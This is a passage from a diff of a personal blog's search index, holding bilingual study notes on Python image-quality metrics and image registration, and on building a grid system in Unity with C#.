    7
    8
    9
    """calculates root mean squared error (rmse).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.

    :returns: float -- rmse value.
    """
    rmse_img = full_ref.rmse(ref_img, img)
    print("RMSE: root mean squared error = ", rmse_img)
    RMSE: root mean squared error =  13.07054944944854
    • root mean squared error (rmse) using sliding window
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    """calculates root mean squared error (rmse) using sliding window.

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).

    :returns: tuple -- rmse value,rmse map.
    """
    rmse_sw_img = full_ref.rmse_sw(ref_img, img, ws=8)
    print("RMSE_SW: root mean squared error with sliding window = ", rmse_sw_img)
    RMSE_SW: root mean squared error with sliding window =  (11.495024661505164, array([[[6.31466547, 6.31466547, 6.31466547],        [6.34182545, 6.34182545, 6.34182545],        [6.10327781, 6.10327781, 6.10327781],        ...,        [7.47704821, 7.47704821, 7.47704821],        [7.13267131, 7.13267131, 7.13267131],        [7.23057743, 7.23057743, 7.23057743]],       [[5.84433486, 5.84433486, 5.84433486],        [5.8255901 , 5.8255901 , 5.8255901 ],        [5.52409495, 5.52409495, 5.52409495],        ...,        [8.14996166, 8.14996166, 8.14996166],        [7.76912962, 7.76912962, 7.76912962],        [7.94217382, 7.94217382, 7.94217382]],       [[5.9187203 , 5.9187203 , 5.9187203 ],        [5.84967948, 5.84967948, 5.84967948],        [5.51701912, 5.51701912, 5.51701912],        ...,        [7.7741559 , 7.7741559 , 7.7741559 ],        [7.49478986, 7.49478986, 7.49478986],        [7.71463706, 7.71463706, 7.71463706]],       ...,       [[6.12627538, 6.12627538, 6.12627538],        [5.84967948, 5.84967948, 5.84967948],        [5.89623821, 5.89623821, 5.89623821],        ...,        [6.6602834 , 6.6602834 , 6.6602834 ],        [6.55982088, 6.55982088, 6.55982088],        [6.43234017, 6.43234017, 6.43234017]],       [[5.92927061, 5.92927061, 5.92927061],        [5.71319744, 5.71319744, 5.71319744],        [5.8656841 , 5.8656841 , 5.8656841 ],        ...,        [6.66848933, 6.66848933, 6.66848933],        [6.51800391, 6.51800391, 6.51800391],        [6.27245965, 6.27245965, 6.27245965]],       [[5.69539287, 5.69539287, 5.69539287],        [5.48007755, 5.48007755, 5.48007755],        [5.55512151, 5.55512151, 5.55512151],        ...,        [6.83053805, 6.83053805, 6.83053805],        [6.63678198, 6.63678198, 6.63678198],        [6.09559267, 6.09559267, 6.09559267]]]))
    • calculates spectral angle mapper (sam).
    1
    2
    3
    4
    5
    6
    7
    8
    9
    """calculates spectral angle mapper (sam).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.

    :returns: float -- sam value.
    """
    ref_sam_img = full_ref.sam(ref_img, img)
    print("REF_SAM: spectral angle mapper = ", ref_sam_img)
    REF_SAM: spectral angle mapper =  0.106389325534101
    • Structural similarity index
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    """calculates structural similarity index (ssim).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).
    :param K1: First constant for SSIM (default = 0.01).
    :param K2: Second constant for SSIM (default = 0.03).
    :param MAX: Maximum value of datarange (if None, MAX is calculated using image dtype).

    :returns: tuple -- ssim value, cs value.
    """
    ssim_img = full_ref.ssim(ref_img, img, ws=11, K1=0.01, K2=0.03, MAX=None, fltr_specs=None, mode='valid')
    print("SSIM: structural similarity index = ", ssim_img)
    SSIM: structural similarity index =  (0.7221593484301166, 0.7224356503602157)
    • Universal image quality index
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    """calculates universal image quality index (uqi).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param ws: sliding window size (default = 8).

    :returns: float -- uqi value.
    """
    UQI_img = full_ref.uqi(ref_img, img, ws=8)
    print("UQI: universal image quality index = ", UQI_img)
    UQI: universal image quality index =  0.9892148366610988
    • Pixel Based Visual Information Fidelity (vif-p)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    """calculates Pixel Based Visual Information Fidelity (vif-p).

    :param GT: first (original) input image.
    :param P: second (deformed) input image.
    :param sigma_nsq: variance of the visual noise (default = 2)

    :returns: float -- vif-p value.
    """
    VIFP_img = full_ref.vifp(ref_img, img, sigma_nsq=2)
    print("VIFP: Pixel Based Visual Information Fidelity = ", VIFP_img)
    VIFP: Pixel Based Visual Information Fidelity =  0.27836263237462544

    Tutorial 49 - No reference based image quality estimation by quantifying sharpness

    论文: Sharpness Estimation for Document and Scene Images

    Sharpness Estimation for Document and Scene Images

    1
    pip install -e.
    Obtaining file:///C:/Users/gzjzx/Jupyter/DIP/pydom-master  Preparing metadata (setup.py): started  Preparing metadata (setup.py): finished with status 'done'Requirement already satisfied: numpy in c:\users\gzjzx\anaconda3\lib\site-packages (from pydom==0.1) (1.23.1)Requirement already satisfied: opencv-python in c:\users\gzjzx\anaconda3\lib\site-packages (from pydom==0.1) (4.6.0.66)Installing collected packages: pydom  Running setup.py develop for pydomSuccessfully installed pydom-0.1Note: you may need to restart the kernel to use updated packages.
    1
    2
    3
    4
    5
    6
    from dom import DOM
    import cv2

    img1 = cv2.imread("images/Osteosarcoma_01.tif", 1)
    img2 = cv2.imread("images/Osteosarcoma_01_1sigma_blur.tif", 1)
    img3 = cv2.imread("images/Osteosarcoma_01_2sigma_blur.tif", 1)
    1
    iqa = DOM()
    • 计算清晰度指数:
    1
    2
    3
    4
    5
    6
    7
    score1 = iqa.get_sharpness(img1)
    score2 = iqa.get_sharpness(img2)
    score3 = iqa.get_sharpness(img3)

    print("Sharpness for reference image:", score1)
    print("Sharpness for 1sigma blurred image:", score2)
    print("Sharpness for 2sigma blurred image:", score3)
    Sharpness for reference image: 0.720903262659802Sharpness for 1sigma blurred image: 0.8156158621086446Sharpness for 2sigma blurred image: 0.5502472959626157

    Tutorial 50 - No reference based image quality using BRISQUE -in Python

    • BRISQUE calculates the no-reference image quality score for an image using the Blind/Referenceless Image Spatial Quality Evaluator(BRISQUE).
      • BRISQUE 使用盲/无参考图像空间质量评估器(BRISQUE)计算图像的无参考图像质量分数。
    • BRISQUE score is computed using a support vector regression (SVR) model trained on an image database with corresponding differential mean opinion score (DMOS) values.
      • BRISQUE 评分的计算使用支持向量回归(SVR)模型训练的图像数据库与相应的差分平均意见评分(DMOS)值。
    • The database contains images with known distortion such as compression artifacts, blurring, and noise.
      • 该数据库包含已知失真的图像,如压缩伪影、模糊和噪声。
    • The image to be scored must have at least one of the distortions for which th model was trained.
      • 要评分的图像必须至少有一个失真的模型训练。
    1
    pip install image-quality
    1
    2
    3
    import numpy as np
    from skimage import io, img_as_float
    import imquality.brisque as brisque

    暂时跑不了…过段时间再解决?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    #img = img_as_float(io.imread('noisy_images/BSE.jpg', as_gray=True))
    img = img_as_float(io.imread('images/noisy_images/sandstone_25sigma_noisy.tif', as_gray=True))

    score = brisque.score(img)
    print("Brisque score = ", score)

    # Now let us check BRISQUE scores for a few blurred images.

    img0 = img_as_float(io.imread('images/blurred_images/sandstone.tif', as_gray=True))
    img2 = img_as_float(io.imread('images/blurred_images/sandstone_2sigma_blur.tif', as_gray=True))
    img3 = img_as_float(io.imread('images/blurred_images/sandstone_3sigma_blur.tif', as_gray=True))
    img5 = img_as_float(io.imread('images/blurred_images/sandstone_5sigma_blur.tif', as_gray=True))

    score0 = brisque.score(img0)
    score2 = brisque.score(img2)
    score3 = brisque.score(img3)
    score5 = brisque.score(img5)

    print("BRISQUE Score for 0 blur = ", score0)
    print("BRISQUE Score for 2sigma blur = ", score2)
    print("BRISQUE Score for 3sigma blur = ", score3)
    print("BRISQUE Score for 5sigma blur = ", score5)
    1
    2
    3
    4
    5
    6
    7
    from skimage.metrics import peak_signal_noise_ratio

    psnr_1 = peak_signal_noise_ratio(img0, img1)
    psnr_2 = peak_signal_noise_ratio(img0, img2)

    print("PSNR for 1sigma blur = ", psnr_1)
    print("PSNR for 2sigma blur = ", psnr_2)
    PSNR for 1sigma blur =  37.288893529075025PSNR for 2sigma blur =  33.23605158876105
    ]]>
    @@ -9246,7 +9246,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(46-47)-Image%20Registration/ - 正文

    Tutorial 46 - Useful image registration libraries in python

    python 中有用的图像配准库

    搞得不是很懂…

    Various types of image registration 各种类型的图像配准

    • Translation

      • 平移
    • Rigid body (translation + rotation)

      • 刚体(平移+旋转)
    • Scaled rotation (translation + rotation + scaling)

      • 缩放旋转(平移+旋转+缩放)
    • Affine (translation + rotation + scaling + shearing)

      • 仿射(平移+旋转+缩放+剪切)
    • Bilinear (non-linear transformation; does not preserve straight lines)

      • 双线性(非线性变换; 不保留直线)

    image_registration library - inspired by astronomers
    pip install image_registration

    2-D rigid translation

    • Chi2shift: Find the offsets between image 1 and image 2 using the DFT upsampling method combined with $\chi^2$ to measure the errors on the fit.

      • Chi2 转换: 使用 DFT 上采样方法结合$\chi^2$,找到图像 1 和图像 2 之间的偏移量,测量拟合误差。
    • Cross correlation shift: Use cross-correlation and a $2^{nd}$ order Taylor expansion to measure the offset between two images.

      • 互相关转变: 使用相互关系和$2^{nd}$阶泰勒展开来测量两幅图像之间的偏移量。

    Optical flow based image shift 基于光流的图像移位
    part of scikit-image (and also opencv)

    • Optical flow is the vector field(u, v)

      • 光流是向量场(u, v)
    • For every pixel in image 1 you get a vector showing where it moved to in image 2.

      • 对于图像 1 中的每个像素,你会得到一个向量,显示它在图像 2 中的移动位置。
    • The vector field can then be used for registeration by image warping.

      • 然后,可以使用矢量场通过图像扭曲进行配准。

    Pystackreg library
    pip install pystacking

    • Python/C++ port of the ImageJ extension TurboReg/StackReg written by Philippe Thevenaz/EPFL.

      • ImageJ 扩展 TurboReg/StackReg 的 Python/ c++端口,由 Philippe Thevenaz/EPFL 编写。
    • Automatic alignment of a source image or a stack(movie) to a target image/reference frame.

      • 自动对齐源图像或堆栈(电影)到目标图像/参考帧。
    • Performs translation, rigid body, scaled rotation, and affline.

      • 执行平移、刚体、缩放旋转和仿射。

    Also…

    • register each frame to the previous

      • 将每一帧寄存到前一帧
    • register to first image

      • 寄存到第一个图像
    • register to mean image

      • 寄存均值图像
    • register to mean of first 10 images

      • 寄存为前 10 个图像的平均值
    • calculate a moving average of 10 images, then register the moving average to the mean of the first 10 images and transform the original image(not the moving average)

      • 计算 10 张图像的移动平均值,然后将移动平均值寄存到前 10 张图像的平均值,并转换原始图像(不是移动平均值)
    from skimage import io
    from image_registration import chi2_shift

    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
    • Method 1: chi squared shift
      • Find the offsets between image 1 and image 2 using the DFT upsampling method 2D rigid
        • 利用二维刚性 DFT 上采样方法找到图像 1 和图像 2 之间的偏移量
    noise=0.1
    xoff, yoff, exoff, eyoff = chi2_shift(image, offset_image, noise,
    return_error=True, upsample_factor='auto')

    print("Offset image was translated by: 18, -17")
    print("Pixels shifted by: ", xoff, yoff)

    from scipy.ndimage import shift
    corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

    from matplotlib import pyplot as plt
    fig = plt.figure(figsize=(10, 10))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(offset_image, cmap='gray')
    ax2.title.set_text('Offset image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(corrected_image, cmap='gray')
    ax3.title.set_text('Corrected')
    plt.show()
    Offset image was translated by: 18, -17Pixels shifted by:  18.001953125 -16.990234375

    png

    • Method 2: Cross correlation based shift 基于交叉相关的位移
      • Use cross-correlation and a 2nd order taylor expansion to measure the shift
        • 使用互相关和二阶泰勒展开来测量位移
    from skimage import io
    from image_registration import cross_correlation_shifts

    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
    # offset image translated by (-17, 18) in y and x


    xoff, yoff = cross_correlation_shifts(image, offset_image)


    print("Offset image was translated by: 18, -17")
    print("Pixels shifted by: ", xoff, yoff)


    from scipy.ndimage import shift
    corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

    from matplotlib import pyplot as plt
    fig = plt.figure(figsize=(10, 10))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(offset_image, cmap='gray')
    ax2.title.set_text('Offset image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(corrected_image, cmap='gray')
    ax3.title.set_text('Corrected')
    plt.show()
    Offset image was translated by: 18, -17Pixels shifted by:  18.00140750783571 -16.988641048024164

    png

    Tutorial 47 - Image registration using pystackreg library

    Image registration using pystackreg

    • Python/C++ port of the ImageJ extension TurboReg/StackReg written by Philippe Thevenaz/EPFL.

      • ImageJ 扩展 TurboReg/StackReg 的 Python/ c++端口,由 Philippe Thevenaz/EPFL 编写。
    • Automatic alignment of a source image or a stack(movie) to a tatget image/reference frame.

      • 自动对齐源图像或堆栈(电影)到目标图像/参考帧。
    • Performs translation, rigid body, scaled rotation, and affine.

      • 执行平移、刚体、缩放旋转和仿射。

    Also…

    • register each frame to the previous
      • 将每一帧寄存到前一帧
    • register to first image
      • 寄存到第一个图像
    • register to mean image
      • 寄存均值图像
    • register to mean of first 10 images
      • 寄存为前 10 个图像的平均值
    • calculate a moving average of 10 images, then register the moving average to the mean of the first 10 images and transform the original image(not the moving average)
      • 计算 10 张图像的移动平均值,然后将移动平均值寄存到前 10 张图像的平均值,并转换原始图像(不是移动平均值)
    ]]>
    + 正文

    Tutorial 46 - Useful image registration libraries in python

    python 中有用的图像配准库

    搞得不是很懂…

    Various types of image registration 各种类型的图像配准

    • Translation

      • 平移
    • Rigid body (translation + rotation)

      • 刚体(平移+旋转)
    • Scaled rotation (translation + rotation + scaling)

      • 缩放旋转(平移+旋转+缩放)
    • Affine (translation + rotation + scaling + shearing)

      • 仿射(平移+旋转+缩放+剪切)
    • Bilinear (non-linear transformation; does not preserve straight lines)

      • 双线性(非线性变换; 不保留直线)

    image_registration library - inspired by astronomers
    pip install image_registration

    2-D rigid translation

    • Chi2shift: Find the offsets between image 1 and image 2 using the DFT upsampling method combined with $\chi^2$ to measure the errors on the fit.

      • Chi2 转换: 使用 DFT 上采样方法结合$\chi^2$,找到图像 1 和图像 2 之间的偏移量,测量拟合误差。
    • Cross correlation shift: Use cross-correlation and a $2^{nd}$ order Taylor expansion to measure the offset between two images.

      • 互相关转变: 使用相互关系和$2^{nd}$阶泰勒展开来测量两幅图像之间的偏移量。

    Optical flow based image shift 基于光流的图像移位
    part of scikit-image (and also opencv)

    • Optical flow is the vector field(u, v)

      • 光流是向量场(u, v)
    • For every pixel in image 1 you get a vector showing where it moved to in image 2.

      • 对于图像 1 中的每个像素,你会得到一个向量,显示它在图像 2 中的移动位置。
    • The vector field can then be used for registeration by image warping.

      • 然后,可以使用矢量场通过图像扭曲进行配准。

    Pystackreg library
    pip install pystacking

    • Python/C++ port of the ImageJ extension TurboReg/StackReg written by Philippe Thevenaz/EPFL.

      • ImageJ 扩展 TurboReg/StackReg 的 Python/ c++端口,由 Philippe Thevenaz/EPFL 编写。
    • Automatic alignment of a source image or a stack(movie) to a target image/reference frame.

      • 自动对齐源图像或堆栈(电影)到目标图像/参考帧。
    • Performs translation, rigid body, scaled rotation, and affline.

      • 执行平移、刚体、缩放旋转和仿射。

    Also…

    • register each frame to the previous

      • 将每一帧寄存到前一帧
    • register to first image

      • 寄存到第一个图像
    • register to mean image

      • 寄存均值图像
    • register to mean of first 10 images

      • 寄存为前 10 个图像的平均值
    • calculate a moving average of 10 images, then register the moving average to the mean of the first 10 images and transform the original image(not the moving average)

      • 计算 10 张图像的移动平均值,然后将移动平均值寄存到前 10 张图像的平均值,并转换原始图像(不是移动平均值)
    1
    2
    3
    4
    5
    from skimage import io
    from image_registration import chi2_shift

    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
    • Method 1: chi squared shift
      • Find the offsets between image 1 and image 2 using the DFT upsampling method 2D rigid
        • 利用二维刚性 DFT 上采样方法找到图像 1 和图像 2 之间的偏移量
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    noise=0.1
    xoff, yoff, exoff, eyoff = chi2_shift(image, offset_image, noise,
    return_error=True, upsample_factor='auto')

    print("Offset image was translated by: 18, -17")
    print("Pixels shifted by: ", xoff, yoff)

    from scipy.ndimage import shift
    corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

    from matplotlib import pyplot as plt
    fig = plt.figure(figsize=(10, 10))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(offset_image, cmap='gray')
    ax2.title.set_text('Offset image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(corrected_image, cmap='gray')
    ax3.title.set_text('Corrected')
    plt.show()
    Offset image was translated by: 18, -17Pixels shifted by:  18.001953125 -16.990234375

    png

    • Method 2: Cross correlation based shift 基于交叉相关的位移
      • Use cross-correlation and a 2nd order taylor expansion to measure the shift
        • 使用互相关和二阶泰勒展开来测量位移
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    from skimage import io
    from image_registration import cross_correlation_shifts

    image = io.imread("images/Osteosarcoma_01.tif", as_gray=True)
    offset_image = io.imread("images/Osteosarcoma_01_transl.tif", as_gray=True)
    # offset image translated by (-17, 18) in y and x


    xoff, yoff = cross_correlation_shifts(image, offset_image)


    print("Offset image was translated by: 18, -17")
    print("Pixels shifted by: ", xoff, yoff)


    from scipy.ndimage import shift
    corrected_image = shift(offset_image, shift=(-xoff,-yoff), mode='constant')

    from matplotlib import pyplot as plt
    fig = plt.figure(figsize=(10, 10))
    ax1 = fig.add_subplot(2,2,1)
    ax1.imshow(image, cmap='gray')
    ax1.title.set_text('Input Image')
    ax2 = fig.add_subplot(2,2,2)
    ax2.imshow(offset_image, cmap='gray')
    ax2.title.set_text('Offset image')
    ax3 = fig.add_subplot(2,2,3)
    ax3.imshow(corrected_image, cmap='gray')
    ax3.title.set_text('Corrected')
    plt.show()
    Offset image was translated by: 18, -17Pixels shifted by:  18.00140750783571 -16.988641048024164

    png

    Tutorial 47 - Image registration using pystackreg library

    Image registration using pystackreg

    • Python/C++ port of the ImageJ extension TurboReg/StackReg written by Philippe Thevenaz/EPFL.

      • ImageJ 扩展 TurboReg/StackReg 的 Python/ c++端口,由 Philippe Thevenaz/EPFL 编写。
    • Automatic alignment of a source image or a stack(movie) to a tatget image/reference frame.

      • 自动对齐源图像或堆栈(电影)到目标图像/参考帧。
    • Performs translation, rigid body, scaled rotation, and affine.

      • 执行平移、刚体、缩放旋转和仿射。

    Also…

    • register each frame to the previous
      • 将每一帧寄存到前一帧
    • register to first image
      • 寄存到第一个图像
    • register to mean image
      • 寄存均值图像
    • register to mean of first 10 images
      • 寄存为前 10 个图像的平均值
    • calculate a moving average of 10 images, then register the moving average to the mean of the first 10 images and transform the original image(not the moving average)
      • 计算 10 张图像的移动平均值,然后将移动平均值寄存到前 10 张图像的平均值,并转换原始图像(不是移动平均值)
    ]]>
    @@ -9273,7 +9273,7 @@ /posts/Unity-Unity%E4%B8%AD%E7%9A%84%E7%BD%91%E6%A0%BC%E7%B3%BB%E7%BB%9F%E5%8F%8AAStar%E7%AE%97%E6%B3%95/ - 相关资源

    ​ 在本科毕设的时候使用到的一个 Unity 的网格系统, 但是那时候没有做笔记有点忘了 orz, 现在为了做算法大作业再拿出来用用…只看了前三节的部分实现 A*算法就行.

    ​ 这个 CodeMonkey 的代码能力还是很牛逼的, 我不介意重学一遍

    正文

    网格系统

    Grid System in Unity (Heatmap, Pathfinding, Building Area)

    设计 Grid 类

    建立了一个 Grid 类, 包含如下元素:

    • 宽 width
    • 高 height
    • 网格大小 cellSize
    • 起始位置 originPosition
    • 网格数组 gridArray
    • debug 用数组 debugTextArray
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    设计构造函数

    设计构造函数 public Grid(int width, int height, float cellSize, Vector3 originPosition)

    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }

    坐标转换

    此时有两种坐标:

    • 网格坐标 XY (数组的下标)
    • 游戏中的世界坐标 WorldPosition

    设计两个函数用于两种坐标之间的转换:

    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    设置网格系统中的值

    根据坐标设置网格系统中的值:

    public void SetValue(int x, int y, int value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
    }

    获取网格系统中的值

    根据坐标获取网格系统中的值:

    public int GetValue(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return 0;
    }
    }

    public int GetValue(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
    }

    鼠标交互

    Testing.cs 中使用 Grid 类, 使用鼠标可以修改/获取网格系统中的值. 下面是 Testing.cs 的完整代码:

    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid grid;
    // Start is called before the first frame update
    void Start()
    {
    grid = new Grid(4, 2, 10f, new Vector3(20, 0));
    }

    private void Update()
    {
    if (Input.GetMouseButtonDown(0))
    {
    grid.SetValue(UtilsClass.GetMouseWorldPosition(), 56);
    }
    if (Input.GetMouseButtonDown(1))
    {
    Debug.Log(grid.GetValue(UtilsClass.GetMouseWorldPosition()));
    }
    }
    }

    Grid.cs 完整代码

    Grid.cs 的完整代码:

    using UnityEngine;
    using CodeMonkey.Utils;

    public class Grid
    {
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetValue(int x, int y, int value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
    }

    public int GetValue(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return 0;
    }
    }

    public int GetValue(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
    }
    }

    Powerful Generics Added! Grid System in Unity (Terraria, Minesweeper, Tilemap)

    使用泛型

    大概意思就是修改上一章的Grid.cs, 添加泛型, 增加代码的重用性

    将类名修改为:

    public class Grid<TGridObject>

    网格数组 gridArray 中的类型不再使用 int, 而是使用<TGridObject>:

    private TGridObject[,] gridArray;

    构造函数使用了委托Func<Grid<TGridObject>, int, int, TGridObject> createGridObject:

    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)

    使用了事件 event, 但是我没学过 orz 就照抄了…

    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
    public int x;
    public int y;
    }

    Grid.cs 完整代码

    一些函数的名称也因语义做相关改变, 附Grid.cs的完整代码:

    using UnityEngine;
    using CodeMonkey.Utils;
    using System;

    public class Grid<TGridObject>
    {
    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
    public int x;
    public int y;
    }

    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private TGridObject[,] gridArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new TGridObject[width, height];

    for(int x = 0; x < gridArray.GetLength(0); x++)
    {
    for(int y = 0; y < gridArray.GetLength(1); y++)
    {
    gridArray[x, y] = createGridObject(this, x, y);
    }
    }

    bool showDebug = true;
    if (showDebug)
    {
    TextMesh[,] debugTextArray = new TextMesh[width, height];
    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y]?.ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);

    OnGridValueChanged += (object sender, OnGridValueChangedEventArgs eventArgs) =>
    {
    debugTextArray[eventArgs.x, eventArgs.y].text = gridArray[eventArgs.x, eventArgs.y]?.ToString();
    };
    }
    }
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetGridObject(int x, int y, TGridObject value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    if (OnGridValueChanged != null)
    {
    OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
    }
    }
    }

    public void TriggerGridObjectChanged(int x, int y)
    {
    if (OnGridValueChanged != null)
    {
    OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
    }
    }

    public void SetGridObject(Vector3 worldPosition, TGridObject value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetGridObject(x, y, value);
    }

    public TGridObject GetGridObject(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return default(TGridObject);
    }
    }

    public TGridObject GetGridObject(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetGridObject(x, y);
    }
    }

    设计并使用 HeatMapGridObject 类

    此时就可以在 Testing.cs中自行设计类, 在网格系统中存储自己想要存储的数据:

    (因为我不需要使用热图, 所以没有按照视频搬运热图相关的代码)

    设计并使用 HeatMapGridObject 类的完整 Testing.cs 代码:

    using UnityEngine;
